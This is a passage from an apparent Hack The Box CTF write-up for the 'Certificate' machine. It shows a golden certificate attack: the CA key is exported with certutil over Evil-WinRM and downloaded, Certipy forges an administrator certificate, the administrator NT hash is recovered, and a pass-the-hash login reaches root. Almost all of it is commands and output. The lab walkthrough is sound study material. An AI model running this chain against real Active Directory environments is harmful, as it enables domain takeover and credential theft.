*Evil-WinRM* PS C:\Users\Ryan.K\Documents> certutil -exportpfx my "75b2f4bbf31f108945147b466131bdca" ca_exported.pfx
my "Personal"
================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 3:55 PM
 NotAfter: 11/3/2034 4:05 PM
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Template Name (Certificate Type): CA
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template: CA, Root Certification Authority
Cert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8
  Key Container = Certificate-LTD-CA
  Unique container name: 26b68cbdfcd6f5e467996e3f3810f3ca_7989b711-2e3f-4107-9aae-fb8df2e3b958
  Provider = Microsoft Software Key Storage Provider
Signature test passed
Enter new password for output file ca_exported.pfx:
Enter new password:
Confirm new password:
CertUtil: -exportPFX command completed successfully.
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> 
1
download ca_exported.pfx
1
2
3
4
5
6
7
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> download ca_exported.pfx
                                        
Info: Downloading C:\Users\Ryan.K\Documents\ca_exported.pfx to ca_exported.pfx
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> 

Use Certipy to forge a certificate with the UPN of a high-privileged user (e.g., administrator@certificate.htb):

1
certipy forge -ca-pfx 'ca_exported.pfx' -upn administrator@certificate.htb -subject 'CN=ADMINISTRATOR,CN=USERS,DC=CERTIFICATE,DC=HTB'
1
2
3
4
5
6
──(kali㉿kali)-[~/HTB-machine/certificate/try1]
└─$ certipy forge -ca-pfx 'ca_exported.pfx' -upn administrator@certificate.htb -subject 'CN=ADMINISTRATOR,CN=USERS,DC=CERTIFICATE,DC=HTB'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Saving forged certificate and private key to 'administrator_forged.pfx'
[*] Wrote forged certificate and private key to 'administrator_forged.pfx'

Authenticate with the Forged Certificate

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[~/HTB-machine/certificate/try1]
└─$ certipy auth -dc-ip 10.10.11.71 -pfx 'administrator_forged.pfx' -username 'administrator' -domain 'certificate.htb'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@certificate.htb'
[*] Using principal: 'administrator@certificate.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certificate.htb': aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6
                                                    
1
evil-winrm -i 10.10.11.71 -u administrator -H d804304519bf0143c14cbf1c024408c6
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~/HTB-machine/certificate/try1]
└─$ evil-winrm -i 10.10.11.71 -u administrator -H d804304519bf0143c14cbf1c024408c6
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
************33889c498b378a11e438cf7
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Hacking Articles – Golden Certificate Attack

The Hacker Recipes – Golden Certificate

This post is licensed under CC BY 4.0 by the author.